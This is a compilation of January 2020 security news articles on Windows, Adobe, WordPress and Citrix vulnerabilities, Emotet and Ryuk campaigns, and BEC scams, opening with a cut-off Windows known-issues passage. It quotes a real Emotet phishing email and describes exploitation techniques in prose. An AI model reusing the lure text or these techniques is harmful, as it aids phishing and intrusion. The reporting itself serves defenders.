Uninstall and reinstall any recently added language packs. For instructions, see Manage the input and display language settings in Windows 10.
Select Check for Updates and install the April 2019 Cumulative Update. For instructions, see Update Windows 10.
Note If reinstalling the language pack does not mitigate the issue, reset your PC as follows:

Go to the Settings app > Recovery.
Select Get Started under the Reset this PC recovery option.
Select Keep my Files.
Microsoft is working on a resolution and will provide an update in an upcoming release.

When setting up a new Windows device during the Out of Box Experience (OOBE), you might be unable to create a local user when using Input Method Editor (IME). This issue might affect you if you are using the IME for Chinese, Japanese, or Korean languages.

Note This issue does not affect using a Microsoft Account during OOBE.
To mitigate this issue, set the keyboard language to English during user creation or use a Microsoft Account to complete OOBE. You can set the keyboard language back to your preferred language after user creation. Once the OOBE is done and you are at the desktop, you can rename the current user using these instructions. If you prefer to create a new local user, see KB4026923.

Microsoft is working on a resolution and will provide an update in an upcoming release.


Microsoft Fixes Windows CryptoAPI Spoofing Flaw Reported by NSA
20.1.2020 
Bleepingcomputer  Vulnerebility

Microsoft patched a spoofing vulnerability present in the Windows usermode cryptographic library, CRYPT32.DLL, on Windows 10, Windows Server 2016, and Windows Server 2019 systems.

In a media call with the NSA that Bleeping Computer joined, the National Security Agency (NSA) stated that they discovered this vulnerability and immediately reported it to Redmond's security team.

Both NSA and Microsoft say that the vulnerability hasn't yet been exploited in the wild, while the agency recommends in its own advisory to install the patches delivered with Microsoft's January 2020 Patch Tuesday as soon as possible to block attackers from defeating "trusted network connections and deliver executable code while appearing as legitimately trusted entities."

In its second-ever Emergency Directive, DHS' Cybersecurity and Infrastructure Security Agency (CISA) also "strongly recommends agencies initiate patching immediately, with a focus on patching the Windows 10 and Server 2016/2019 systems impacted by CVE-2020-0601.

Agencies should prioritize patching mission-critical systems and High-Value Assets (HVAs), internet-accessible systems, and servers. Agencies should then apply the patch to the remaining endpoints."

The consequences of not patching the vulnerability are severe and widespread. Remote exploitation tools will likely be made quickly and widely available. Rapid adoption of the patch is the only known mitigation at this time and should be the primary focus for all network owners. - NSA

Spoofing ECC certificate chains' validity
"A spoofing vulnerability exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates," says Microsoft's security advisory. "An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear the file was from a trusted, legitimate source.

The user would have no way of knowing the file was malicious, because the digital signature would appear to be from a trusted provider," Microsoft adds.

After successfully exploiting unpatched systems, attackers can launch man-in-the-middle attacks, as well as decrypt confidential info from user connections to the impacted software.

"By exploiting this vulnerability, an attacker may be able to spoof a valid X.509 certificate chain on a vulnerable Windows system," CERT/CC vulnerability analyst Will Dormann explains.

"This may allow various actions including, but not limited to, interception and modification of TLS-encrypted communications or spoofing an Authenticode signature."

Will Dormann
@wdormann
Replying to @wdormann
Now that it's all public:
1) CVE-2020-0601 - Windows doesn't properly validate X.509 certificate chains. https://www.kb.cert.org/vuls/id/849224/
2) CVE-2020-0609, CVE-2020-0610 - Windows Remote Desktop Gateway (not to be confused with RDP proper) unauthenticated RCE.https://www.kb.cert.org/vuls/id/491944/

188
7:14 PM - Jan 14, 2020
Twitter Ads info and privacy
182 people are talking about this
Microsoft's security update addresses the vulnerability tracked as CVE-2020-0601 and reported by the NSA by making sure that the Windows CryptoAPI completely validates ECC certificates.

"This vulnerability is classed Important and we have not seen it used in active attacks," Microsoft Security Response Center' Principal Security Program Manager Mechele Gruhn added.

"This vulnerability is one example of our partnership with the security research community where a vulnerability was privately disclosed and an update released to ensure customers were not put at risk."

Microsoft encourages security researchers and organizations to report other potential vulnerabilities using the company's MSRC Researcher Portal.

Mitigation, prevention, and detection options
The NSA security advisory also provides mitigation measures for systems where immediately installing the patches Microsoft released as part of its January 2020 Patch Tuesday.

"Network devices and endpoint logging features may prevent or detect some methods of exploitation," says the agency's advisory.

"Properly configured and managed TLS inspection proxies independently validate TLS certificates from external entities and will reject invalid or untrusted certificates, protecting endpoints from certificates that attempt to exploit the vulnerabilities.

Ensure that certificate validation is enabled for TLS proxies to limit exposure to this class of vulnerabilities and review logs for signs of exploitation."

The NSA also recommends using capture analysis tools like Wireshark and tools such as OpenSSL and the Windows certutil utility to extract and analyze certificates to detect any malicious properties.

Certutil can be used to examine an X509 certificate by running the following command:
o certutil –asn

OpenSSL can be used to examine an X509 certificate by running the following command:
o openssl asn1parse –inform DER –in –i –dump
or
o openssl x509 –inform DER –in –text

Certutil can be used to list registered elliptic curves and view their parameters by running the following commands:
o certutil –displayEccCurve
o certutil –displayEccCurve

OpenSSL can be used to view standard curves enabled/compiled into OpenSSL by running the following commands:
o openssl ecparam –list_curves
o openssl ecparam –name –param_enc explicit –text
"Certificates with named elliptic curves, manifested by explicit curve OID values, can be ruled benign," the NSA explains.

However, "certificates containing explicitly-defined elliptic curve parameters which only partially match a standard curve are suspicious, especially if they include the public key for a trusted certificate, and may represent bona fide exploitation attempts."


Critical WordPress Plugin Bug Allows Admin Logins Without Password
20.1.2020 
Bleepingcomputer  Vulnerebility

A critical authentication bypass vulnerability allows anyone to log in as an administrator user on WordPress sites running an affected version of the InfiniteWP Client because of logical mistakes in the code.

Based on the active installations tracked by the WordPress plugin library, the open-source InfiniteWP plugin is currently installed on over 300,000 websites, while the plugin's site claims that it's installed on over 513,000 sites.

Upon installation, InfiniteWP Client is designed to allow its users to manage an unlimited number of WordPress sites from a central location with "one-click updates for WordPress, plugins, and themes across all your sites" and "one-click updates for WordPress, plugins and themes across all your sites."

Critical authentication bypass flaw
The vulnerability was patched by Revmakx, the plugin's maker, on January 8 with the release of InfiniteWP Client 1.9.4.5, one day after researchers at web app security outfit WebARX disclosed the vulnerability on January 7.

Since the InfiniteWP Client version including the security fix was released, a little over 167,000 users have already updated their installation, with around 130K left to patch to secure their websites from potential future attacks.

"In order for the request to even get to the vulnerable part of the code, we first must encode the payload with JSON, then Base64, then send it raw to the site in a POST request," WebARX says.

"All we need to know is the username of an administrator on the site. After the request has been sent, you will automatically be logged in as the user."

The issue was found in the iwp_mmb_set_request function found in the init.php file, a function designed to check if actions attempted by a user are authenticated.

However, the researchers found that the readd_site and add_site don't have an authorization check, a flaw that can be exploited with the correct payload to have the InfiniteWP server automatically log any user as an admin.

InfiniteWP
Image: WebARX
"Once the payload meets these conditions, the username parameter that is supplied will be used to login the requester as that user without performing any further authentication," WebARX adds.

Admins who are still using InfiniteWP client version 1.9.4.4 or earlier are advised to update their installations as soon as possible to prevent having their websites compromised.

Another auth bypass caused by Improper Authentication logic and allowing users to login as admins was found in the WordPress plugin dubbed WP Time Capsule.

The WP Time Capsule plugin is also developed by Revmakx and is active on more than 20,000 websites. The flaw was also patched by the developer on January 8, with almost all users (~19,180) having already patched their installations since.


Adobe Releases Their January 2020 Security Updates
20.1.2020 
Bleepingcomputer  Vulnerebility

Adobe has released its monthly security updates that fix vulnerabilities in Adobe Experience Manager and Adobe Illustrator CC. All users are advised to install the applicable updates as soon as possible to resolve these vulnerabilities.

This is the first security update from Adobe in 2020 and surprisingly does not contain any fixes for Adobe Flash Manager, which is typically in the top spot when it comes to the number of vulnerabilities fixed.

There are, though, four vulnerabilities in Adobe Experience Manager and five in Adobe Illustrator CC, with the vulnerabilities in Illustrator being more critical as they can lead to arbitrary code execution.

Below are the Adobe December 2019 security updates:
APSB20-01 Security update available for Adobe Experience Manager
This update fixes four vulnerabilities in the Adobe Experience Manager.

Of the 4 vulnerabilities that were fixed by this update, three are classified as 'Important' and one as 'Moderate'. These vulnerabilities allow an attacker to gain view information on the computer that they would normally not have access to.

Vulnerability Category
Vulnerability Impact
Severity
CVE Number
Affected Versions Download Package
Reflected Cross-Site Scripting
Sensitive Information disclosure

Important CVE-2019-16466
AEM 6.3

AEM 6.4

AEM 6.5

Cumulative Fix Pack 6.3.3.7

Service Pack 6.4.7.0

Service Pack 6.5.3.0

Reflected Cross-Site Scripting Sensitive Information disclosure Important CVE-2019-16467
AEM 6.3

AEM 6.4

AEM 6.5

Cumulative Fix Pack 6.3.3.7

Service Pack 6.4.7.0

Service Pack 6.5.3.0

User Interface Injection

Sensitive Information Disclosure

Moderate

CVE-2019-16468

AEM 6.3

AEM 6.4

AEM 6.5

Cumulative Fix Pack 6.3.3.7

Service Pack 6.4.7.0

Service Pack 6.5.3.0

Expression Language injection Sensitive Information Disclosure Important CVE-2019-16469 AEM 6.5 Service Pack 6.5.3.0
Users should download the latest version of Acrobat and Reader to resolve these vulnerabilities.

APSB20-03 Security update available for Adobe Illustrator CC
This security update resolves five 'Critical' vulnerabilities in Adobe Illustrator that could lead to remote code execution. This would allow attackers to use these vulnerabilities in the software to execute almost any command they wish on the computer.

Vulnerability Category Vulnerability Impact Severity CVE Numbers
Memory Corruption Arbitrary Code Execution Critical
CVE-2020-3710

CVE-2020-3711

CVE-2020-3712

CVE-2020-3713

CVE-2020-3714

Users are advised to upgrade to Adobe Illustrator CC 24.0.2 to resolve these vulnerabilities.


United Nations Targeted With Emotet Malware Phishing Attack
20.1.2020 
Bleepingcomputer  Phishing  Virus

Pretending to be the Permanent Mission of Norway, the Emotet operators performed a targeted phishing attack against email addresses associated with users at the United Nations.

Yesterday, the Emotet trojan roared back to life after a 3-week vacation with strong spam campaigns that targeted countries throughout the world.

While Emotet's normal spam campaigns pretended to be fake accounting reports, delivery notices, and invoices, the malware operators had something special in mind for the United Nations.

Impersonating the "Permanent Mission of Norway"
In a sample of a phishing email shared with BleepingComputer by email security firm Cofense, the Emotet operators pretend to be representatives of Norway at the United Nations in New York, who state that there is a problem with an attached signed agreement.

According to Cofense, this phishing campaign had "highly specific targeting" and was seen being sent to 600 unique email addresses at the United Nations.

The email states that the representatives of Norway found a problem with a signed agreement and that the recipient should review it to learn the issue.

Emotet spam targeting the United Nations
Emotet spam targeting the United Nations
The full text of this targeted phishing email can be read below:

Hi,

Please be advised that the new problem has been appeared today.
See below our info for this question.

Please let me know if you need anything else.

Regards

Permanent Mission of Norway to the United Nations in New York
Attached to these emails is a Microsoft Word document that starts with "Doc_01_13" that pretends to be the signed agreement being sent by the Permanent Mission of Norway.

While there was room for Emotet to send a more convincing Word document template, they instead sent the same one that is used for all of the malspam campaigns.

This template pretends to be a warning that the "document only available for desktop or laptop versions of Microsoft Office Word." It then prompts the user to click on 'Enable editing' or 'Enable Content' to view the document.

Malicious Email Attachment
Malicious Email Attachment
If a user opens the document and enables its content, malicious Word macros will be executed that downloads and installs Emotet on the computer.

Emotet will now run in the background while sending out spam emails to other victims.

Eventually, Emotet will also install other payloads such as Trickbot, which would be when things get really bad for the compromised UN workstation.

Emotet can lead to a full network compromise
When Emotet is installed on a machine, one of the malware payloads that is invariably installed is the TrickBot trojan.

The TrickBot trojan will attempt to harvest data from the computer such as cookies, login credentials, files from the computer, and possibly spread to other computers on the network.

After the harvesting of information is finished, TrickBot is known to open a reverse shell back to the operators of Ryuk Ransomware.

These operators will proceed to infiltrate the network, gain administrator credentials, and ultimately deploy Ryuk so that it encrypts every device on the network.

This is particularly worrisome for a UN network as ransomware operators are known to steal data before encrypting files, which could expose extremely sensitive diplomatic or government information.

While there are no known victims of this phishing attack, this targeted attack illustrates that bad actors are constantly trying to get access to the networks of organizations and government networks.

This is why it is imperative for all employees regardless of what sector they work in to be properly trained on how to recognize phishing emails.

Furthermore, before opening any attachments and enabling macros, users should notify their network administrator and contact the alleged user who sent the email to confirm its authenticity.

BleepingComputer has contacted the Permanent Mission of Norway about this attack but has not heard back at this time.


Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices
20.1.2020 
Bleepingcomputer  Ransomware

The Ryuk Ransomware uses the Wake-on-Lan feature to turn on powered off devices on a compromised network to have greater success encrypting them.

Wake-on-Lan is a hardware feature that allows a powered down device to be woken up, or powered on, by sending a special network packet to it. This is useful for administrators who may need to push out updates to a computer or perform scheduled tasks when it is powered down.

According to a recent analysis of the Ryuk Ransomware by Head of SentinelLabs Vitali Kremez, when the malware is executed it will spawn subprocesses with the argument '8 LAN'.

Spawning subprocess with 8 Lan argument
Spawning subprocess with 8 Lan argument
When this argument is used, Ryuk will scan the device's ARP table, which is a list of known IP addresses on the network and their associated mac addresses, and check if the entries are part of the private IP address subnets of "10.", "172.16.", and "192.168."

Checking for private network
Checking for private network
If the ARP entry is part of any of those networks, Ryuk will send a Wake-on-Lan (WoL) packet to the device's MAC address to have it power up. This WoL request comes in the form of a 'magic packet' containing 'FF FF FF FF FF FF FF FF'.

Ryuk sending a WoL packet
Ryuk sending a WoL packet
If the WoL request was successful, Ryuk will then attempt to mount the remote device's C$ administrative share.

Mount the Remote C$ Share
Mount drive to the Remote C$ Share
If they can mount the share, Ryuk will encrypt that remote computer's drive as well.

In conversations with BleepingComputer, Kremez stated that this evolution in Ryuk's tactics allow a better reach in a compromised network from a single device and shows the Ryuk operator's skill traversing a corporate network.

"This is how the group adapted the network-wide ransomware model to affect more machines via the single infection and by reaching the machines via WOL & ARP," Kremez told BleepingComputer. "It allows for more reach and less isolation and demonstrates their experience dealing with large corporate environments."

To mitigate this new feature, administrators should only allow Wake-on-Lan packets from administrative devices and workstations.

This would allow administrators to still benefit from this feature while adding some security to the endpoints.

At the same time, this does not help if an administrative workstation is compromised, which happens quite often in targeted ransomware attacks.

Update 1/14/20 11:28 AM: CrowdStrike also has analysis of this feature here.


Windows 7 Reaches End of Life Tomorrow, What You Need to Know
20.1.2020 
Bleepingcomputer  OS

It's the end of an era: Windows 7 will reach end of support tomorrow, on January 14, a decade after its initial release, with Microsoft to no longer provide users with software updates and security updates or fixes.

"The specific end of support day for Windows 7 will be January 14, 2020," Microsoft says. "After that, technical assistance and software updates from Windows Update that help protect your PC will no longer be available for the product.

Therefore, it's important that you upgrade to a modern operating system such as Windows 10, which can provide the latest security updates to help keep you and your data safer."

For products that have reached their end of support, Microsoft stops providing bug fixes for issues that are discovered, security fixes for newly found vulnerabilities, or technical support.

Customers who still use end of service software are advised by Redmond to move to a new Windows 10 device or to upgrade as soon as possible to avoid falling victim to malware infections and attacks exploiting newly discovered security risks.

Security updates after the end of support
However, as Microsoft says on its support website, "for customers requiring more time to move to the latest product, the Extended Security Update (ESU) program is available for certain legacy products as a last resort option.

The ESU program provides security updates only for up to 3 years, after the End of Support date. Contact your account manager, partner or device manufacturer for more information."

The Extended Security Updates program is available for Windows 7 Professional, Windows 7 Enterprise, and Windows 7 Ultimate through volume licensing programs, and it does not include or provide customers with user-requested non-security updates, new features, or design change requests.

"If an organization waits and purchases ESU for the first time in year two or year three, they will have to pay for the preceding years also," Microsoft adds. "This is because the security updates that are offered under the ESU program are cumulative."

Windows IT Pro

@MSWindowsITPro
Windows 7 will reach end of support on January 14, 2020. If you have questions about obtaining, deploying, or managing Windows 7 Extended Security Updates (ESU) for your org, make sure to join our #AMA next Tuesday (12/17)!! http://aka.ms/ama/Windows7ESU pic.twitter.com/LDmd8wU6vC

56
8:22 PM - Dec 10, 2019
Twitter Ads info and privacy
46 people are talking about this
Besides the ESU program, Redmond also provides the Windows Virtual Desktop program, enabling orgs to continue using Windows 7 with free extended security updates through January 2023.

After Windows 7's end of support, the 0Patch platform will also continue to ship patches to its agents for vulnerabilities rated as high-risk.

"Each Patch Tuesday we'll review Microsoft's security advisories to determine which of the vulnerabilities they have fixed for supported Windows versions might apply to Windows 7 or Windows Server 2008 and present a high-enough risk to warrant micropatching," 0Patch said.

End of support reminders and free Windows 10 upgrades
Microsoft will start displaying full-screen notifications on Windows 7 devices on January 15 to remind users that their operating system is no longer supported and that they should upgrade to the latest Windows 10 version.

Windows 7 Professional customers who have enrolled in the Extended Security Updates program, use domain-joined machines, or machines in kiosk mode will not be shown this reminder.

While Microsoft says that upgrading to Windows 10 from Windows 7 for free was only available until July 29, 2016, free Windows 10 upgrades are still a thing.

You can do so using this step by step Windows 10 upgrade procedure that involves running the Media Creation Tool and choosing the 'Upgrade this PC now' option on your Windows 7 computer.

Windows 7 end of support notification
Windows 7 end of support notification
Chrome and Edge to support Windows 7 after EoL
Google announced that they will keep supporting Google Chrome in Windows 7 through July 15, 2021 (at least), to give companies more time to upgrade to Windows 10.

"We have enterprises covered, even if they haven’t yet made the full move to Windows 10,"Google said. "We will continue to fully support Chrome on Windows 7 for a minimum of 18 months from Microsoft’s End of Life date, until at least July 15, 2021.

So if you haven’t started your move to Windows 10 yet, or even if your organization is mid-way through migration, you can still benefit from the enterprise capabilities of Chrome."

This means that Google Chrome users will still receive browser security updates after Windows 7 end of support, with management tools and enterprise policies to continue to work.

Today, Microsoft also said that they will continue to support their new Microsoft Edge web browser in Windows 7 for as long as Google does.

Other Microsoft products reaching EoL in 2020
Windows 7 is not the only Microsoft product reaching end of support this year, with several other major Microsoft products including Office 2010, Visual Studio 2010, Windows Server 2008 (including 2008R2), and multiple Windows 10 versions also being retired.

A list of some of the most prominent ones and links to more details for each of them is available below.

Product End of Support date
SQL Server 2008 and 2008 R2 07/09/19
Windows Server 2008 and 2008 R2 01/14/20
Exchange Server 2010
Office 2010 client 10/13/20
SharePoint Server 2010
Project Server 2010
Windows 7 currently has a market share of over 26% according to StatCounter and NetMarketShare, with Windows 10 being installed on more than 65% of Windows devices.

Windows 7 market share
Windows 7 market share (NetMarketShare)
In related news, the KDE Community said last week that it wants Windows 7 users to migrate to the Plasma desktop environment after Microsoft's 10-year-old OS reach end of support.

The KDE Community announces at the moment that it wants to help Windows 7 refugees to migrate to one of the 25 Linux distributions with Plasma support.

"Instead of migrating to Windows 10 and putting up with hours of updates, intrusions on your privacy and annoying ads built into your apps, install a Linux operating system with Plasma," KDE said.

"In 30 minutes you will be up and running and you will have all the security and stability of a Linux system, with all the features and ease of use of Plasma."

Out of Windows' current 77% market share, more than 26% are Windows 7 users amounting to almost one billion people that can't let go of the decade-old OS because they either are scared of the change or don't like Windows 10.


Microsoft to Support the New Edge Browser After Windows 7 EOL
20.1.2020 
Bleepingcomputer  OS

Microsoft will continue to support the new Microsoft Edge in Windows 7 even after the operating system reaches the end of life tomorrow.

With tomorrow being the last day that Windows 7 will receive any security and operating system updates from Microsoft, it was not 100% clear if Microsoft would also continue to support Microsoft Edge in the operating system.

Google announced last week that they will continue to support Google Chrome in Windows 7 through at least July 15th, 2021 to give organizations time to upgrade to Windows 10.

"We have enterprises covered, even if they haven’t yet made the full move to Windows 10. We will continue to fully support Chrome on Windows 7 for a minimum of 18 months from Microsoft’s End of Life date, until at least July 15, 2021. So if you haven’t started your move to Windows 10 yet, or even if your organization is mid-way through migration, you can still benefit from the enterprise capabilities of Chrome."

According to a report by Neowin, Microsoft has told them that they will continue to support the new Microsoft Edge in Windows 7 for as long as Google does.

This is because the new Microsoft Edge is a Chromium-based browser, which is the same engine used by Google Chrome. If one works on Windows 7, for the most part, the other will as well.

This is a smart move by both companies as there is no technical reason that either of these browsers should not be able to run in all Windows versions from Windows 7 through Windows 10.

Unless there is a core change in the Windows operating system, I also do not see this changing soon.

With that said, Windows 7 users should upgrade to Windows 10 as soon as possible to keep their operating system secure.

Without security updates, users are at risk from new vulnerabilities that will not be patched and could lead to malware infections, such as ransomware, or the full compromise of a vulnerable computer.

If your hardware supports Windows 10, I strongly suggest you take advantage of Microsoft's free upgrade offer while it is still available.

Update 1/13/20: Microsoft issued us the following vague statement regarding how long they would support Microsoft edge:

"We’re going to continue to support Windows 7 users with the new Microsoft Edge."


CISA Releases Test Tool for Citrix ADC CVE-2019-19781 Vulnerability
20.1.2020 
Bleepingcomputer  Vulnerebility

DHS CISA released a public domain tool designed to help security staff to test if their organizations are vulnerable to ongoing attacks that might target the CVE-2019-19781 security flaw impacting the Citrix Application Delivery Controller (NetScaler ADC) and Citrix Gateway (NetScaler Gateway) products.

"The Cybersecurity and Infrastructure Security Agency (CISA) has released a utility that enables users and administrators to test whether their Citrix Application Delivery Controller (ADC) and Citrix Gateway software is susceptible to the CVE-2019-19781 vulnerability," says the DHS agency.

CISA also strongly recommends all organizations to review CERT/CC’s U#619785 vulnerability note and the Citrix CTX267027 security bulletin to apply the described mitigation measures until new versions of the software will be released.

According to the CTX267027 bulletin, Citrix will be releasing new Citrix ADC and Citrix Gateway versions to patch the CVE-2019-19781 vulnerability starting with January 20, 2020.

US-CERT

@USCERT_gov
Is your Citrix ADC and Gateway software susceptible to CVE-2019-19781? Visit CISA to find out how to test it. https://go.usa.gov/xdqGV #Cyber #Cybersecurity #InfoSec

95
9:03 PM - Jan 13, 2020
Twitter Ads info and privacy
100 people are talking about this
Attackers are probing, exploits already available
The vulnerability makes it possible for unauthenticated attackers to perform arbitrary code execution via directory traversal if successfully exploited.

Several working proof-of-concept (PoC) exploits for the CVE-2019-19781 vulnerability are already publicly available (we won't be linking to them for obvious reasons) from numerous locations.

The PoC exploits allow attackers to create reverse shells back to their machines and execute malicious commands on the compromised devices, effectively enabling the attacker to gain full control over the machines.

Two days earlier, we reported about ongoing scans for vulnerable Citrix hosts following warnings coming from security researchers, coupled with the additional warning that an exploit is imminent and that admins must apply mitigation measures as soon as possible.

Fermin J. Serna
@fjserna
We just published further information around the Citrix ADC/Gateway vulnerability with fix release dates. If I can recommend something, apply the mitigation ASAP if you have the management IP exposed and not firewall protected. It stops the attack on known vulnerable scenarios. https://twitter.com/CitrixNetwork/status/1216153467926073349 …

Citrix Networking
@CitrixNetwork
Blog post from @Citrix CISO @fjserna about updates to the Citrix ADC, Citrix Gateway #CVE201919781 vulnerability - https://bit.ly/36LRITI

122
1:43 AM - Jan 12, 2020
Twitter Ads info and privacy
90 people are talking about this
A technical deep dive for this vulnerability was published by security outfit MDSec, providing a demo of how a working PoC can be used.

TrustedSec also provides a guide that can be followed to check your devices for evidence of a compromise, with Citrix ADC admins being advised to monitor their devices for attacks.

Additionally, Nextron Systems's Florian Roth provided Sigma detection rules for SIEM systems for detecting CVE-2019-19781 exploit attempts on Citrix ADC (NetScaler) and Citrix Gateway devices.

Finally, a list of the estimated dates that patches for the Citrix Application Delivery Controller (ADC) and Citrix Gateway CVE-2019-19781 vulnerability will be published are available below.

Version Refresh Build Expected Release Date
10.5 10.5.70.x 31st January 2020
11.1 11.1.63.x 20th January 2020
12.0 12.0.63.x 20th January 2020
12.1 12.1.55.x 27th January 2020
13.0 13.0.47.x 27th January 2020


BEC Scammers Use Aging Report Phishing to Find New Targets
20.1.2020 
Bleepingcomputer  Phishing  Spam

A group tracked as Ancient Tortoise is targeting accounts receivable specialists tricking them into sending over aging reports and thus collecting info on customers they can scam in later attack stages.

Aging reports (aka schedule of accounts receivable) are collections of outstanding invoices designed to help a company's financial department to keep track of customers who haven't yet paid for goods or services they bought on credit.

These sets of invoices allow accounts and management to get an overview of the company's credit and collection processes by breaking down the outstanding debts into increments going from thirty to more than ninety days overdue.

Going beyond BEC scams
While BEC aka EAC (short for Email Account Compromise) scammers are known for using social engineering or hacking to switch the bank accounts used by an organization's financial department to wire out funds, the Ancient Tortoise actors go beyond that.

A report shared exclusively with BleepingComputer that will go live tomorrow shows how researchers at Agari Cyber Intelligence Division (ACID) observed the new threat group impersonating a company's CFO and requesting an updated aging report together with up to date contact information for each of the customers that had unpaid overdue invoices.

Not asking the company's employees to change payment accounts is a tactic used by Ancient Tortoise to gain their trust and trick them into following up to their demands for company records.

The attackers also made use of name deception and free email accounts designed to mimic the firm's CFO to further strengthen their hoax.

Aging report phishing attack
Aging report phishing attack (Agari)
However, Agari's research team was the one who connected with them, continuing the email exchange to further understand the inner workings of Ancient Tortoise's fraud scheme.

According to Crane Hassold, senior director of threat research at Agari, the research team "happily obliged and sent them a fake aging report containing the names of purported customers, the amounts of overdue payments, and the names and contact details for each of the 'customers' accounts payable points of contact."

The threat actors collected all the fake customer data delivered by Agari's researchers and, two days after the email exchange, they started contacting all the fake customers, "requesting payment for the outstanding invoices referenced in the aging report" and asking for the outstanding invoices to be paid via ACH or wire to a new account.

To make their email look legitimate, Ancient Tortoise registered a new domain about an hour and a half before sending the messages that closely mimicked our fake employee’s domain. Of course, the display name and username used by the scammer also matched our persona as well. - Agari

Given that the attackers now had all the info they needed to create emails that would perfectly match a supplier's messages, the damages following a real-world attack were Ancient Tortoise would have legitimate information on their hands could prove to be severe for some of their victims.

This also allows the group to launch attacks that are a lot more convincing (the phishing emails contain info like order numbers, debt amounts, company details) than your run-of-the-mill BEC attack were the threat actors have to rely on their social engineering skills to deceive their targets.

In the next stage of their attack, Ancient Tortoise actors sent details on the bank account they controlled for the outstanding payments to be delivered.

Atacker-controlled account details
Attacker-controlled account details (Agari)
When requested, Ancient Tortoise also sent the fake customers overdue payment invoices altered to show the attackers' bank account details. This only happened after the actors quickly sent an email to the fake vendor's employee posing as the CFO to have all outstanding invoices delivered "as soon as possible."

The BEC scammers delivered the fake within a time span of roughly 45 minutes from the initial request, showing both resourcefulness and speed when it came to making sure that their victims don't catch on to their scam.

"An analysis of the fake invoice also showed that the scammer’s computer was set to a +4 GMT timezone," Agari also found. "This information lines up nicely with additional intelligence collected during our engagements that indicates the Ancient Tortoise actor was likely located in Dubai, United Arab Emirates."

This is just one of the BEC scammer groups Agari is tracking, with others such as Silent Starling, Curious Orca, and Scattered Canary previously being observed running elaborate BEC schemes that led to the compromise of hundreds of employees from hundreds of companies from all over the world.

"In one case, Silent Starling received a consolidated aging report that included details for more than 3,500 customers with past due payments totaling more than $6.5 million," Agari adds.

Original invoice on the left, Ancient Tortoise-altered invoice on the right
Original invoice on the left, Ancient Tortoise-altered invoice on the right (Agari)
When it comes to defense against such attacks, Agari says that "for vendors and suppliers, where the initial malicious email usually impersonates a company executive, a multi-layered approach to email security is essential, which includes implementing strong anti-phishing email and email authentication protections that specialize in defending against advanced identity deception attacks and brand spoofing.

For companies that work with external suppliers, in addition to utilizing identity deception defenses—for aging reports, attackers impersonate vendors rather than executives—having a formal process for handling outgoing payments (especially if supplier’s normal payment account has changed) is one of the best ways to prevent these types of attacks."

BEC scammers everywhere
According to FBI's Internet Crime Complaint Center (IC3) Internet Crime report published in April 2019, BEC scams were the cybercrime with the highest reported total losses in 2018, with BEC victims losing over $1,2 billion.

The Financial Crimes Enforcement Network (FinCEN) also released a report in July saying that BEC SAR filings (short for suspicious activity reports) grew from a monthly average of $110 million in 2016 to over $301 million per month in 2018.

The IC3 also issued a PSA in September saying that BEC scams are continuing to grow every year, with a 100% rise in the identified global exposed losses between May 2018 and July 2019, and victim complaints with a total exposed dollar loss of more than $26 billion and related to 166,349 incidents being received between June 2016 and July 2019.

While hard to believe, these figures are somewhat backed by incidents such as the one in which Nikkei, one of the largest media organizations in the world, reported a BEC scam that cost the group roughly $29 million in October.

One month earlier, a member of the Toyota Group also announced that it was scammed in a BEC attack, with an expected financial loss of over $37 million.


Nemty Ransomware to Start Leaking Non-Paying Victim's Data
20.1.2020 
Bleepingcomputer  Ransomware

The Nemty Ransomware has outlined plans to create a blog that will be used to publish stolen data for ransomware victims who refuse to pay the ransom.

A new tactic started by the Maze Ransomware and now used by Sodinokibi ​​​​​​is to steal files from companies before encrypting them. If a victim does not pay the ransom, then the stolen data will be leaked little-by-little until payment has been made or it has all been released.

The theory behind this is that companies may be more apt to pay a ransom if it costs less than the possible fines, data breach notification costs, loss of trade and business secrets, tarnishing of brand image, and potential lawsuits for the disclosing of personal data.

To facilitate this publishing of stolen data, the Maze operators have created a web site that they use to publish information about their non-paying victims and links to the leaked data.

Nemty plans on creating a leaked data site
In the Nemty Ransomware affiliate panel, the ransomware developers have a news feed where they post their plans, bug fixes, and upcoming changes coming to their ransomware-as-a-service.

According to a recent 'News' post shared with BleepingComputer, Nemty plans to create a web site where they will leak stolen data if ransoms are not paid.

News feed from Nemty Ransomware affiliate panel
Newsfeed from Nemty Ransomware affiliate panel
Nemty is already configured for network attacks with a builder mode that is used to create executables that target an entire network rather than individual computers.

According to this mode, the created ransomware executables are "only for corporations". This means there will be one key used to decrypt all the devices in the network and victims will not be able to decrypt individual machines.

Nemty Targeted attack ransomware builder
Nemty Targeted attack ransomware builder
With this functionality already in place, evolving the RaaS to incorporate data exfiltration and further extortion tactics would not be a laborious change.

If remains to see if this new extortion method is paying off for the ransomware actors, but one thing is for sure, we will continue to see more threat actors adopting this new tactic.

Even worse, this also means that these types of attacks are not only affecting the company but are causing personal and third-party information to be disclosed to unauthorized users.

While that means that victims should treat these as attacks like data breaches, from existing cases, it does not appear that they are doing so.


Emotet Malware Restarts Spam Attacks After Holiday Break
20.1.2020 
Bleepingcomputer  Spam  Virus

After almost a three-week holiday vacation, the Emotet trojan is back and targeting the over eighty countries with malicious spam campaigns.

When Emotet sends spam campaigns the threat actors utilize various email templates that pretend to be invoices, reports, voice mails, holiday party invites, or even invites to a Greta Thunberg climate change demonstration.

These emails include malicious attachments that when opened will install the Emotet trojan.

Once installed, Emotet will use the victim's computer to send further spam and will also download other infections such as TrickBot, which may ultimately lead to a Ryuk Ransomware infection depending on the target.

Emotet expert Joseph Roosen told BleepingComputer that on December 21st, 2019, Emotet stopped sending spam campaigns even though their command and control servers continued to run and issue updates.

At around 8:30 AM EST today, Roosen told us that Emotet began spewing forth spam campaigns again that target recipients around the world, with a strong focus on the United States.

Emotet is back from the holidays
Current Emotet campaigns being seen today include regular emails and reply-chain attacks pretending to be proof-of-delivery documents, reports, agreements, and statements.

Email security firm Cofense told BleepingComputer that they have seen spam campaigns targeting 82 countries, with a heavy targeting against the United States.

Examples of Emotet spam shared by Cofense with BleepingComputer pretend to be various reports being sent to the victim for their review as shown below. These emails will either include attached documents or links that can be used to download them.

Reply-chain Emotet Spam
Security researcher James also saw the renewal of Emotet's campaigns in the form of proof of delivery documents being sent from alleged account departments.

Proof of delivery spam
Proof of delivery spam
For all of the seen campaigns, when a user opens the attachment they will be presented with a message stating that this "document only available for desktop or laptop versions of Microsoft Office Word." It then prompts the user to click on 'Enable editing' or 'Enable Content' to view the document.

Malicious Word doc
Malicious Word doc
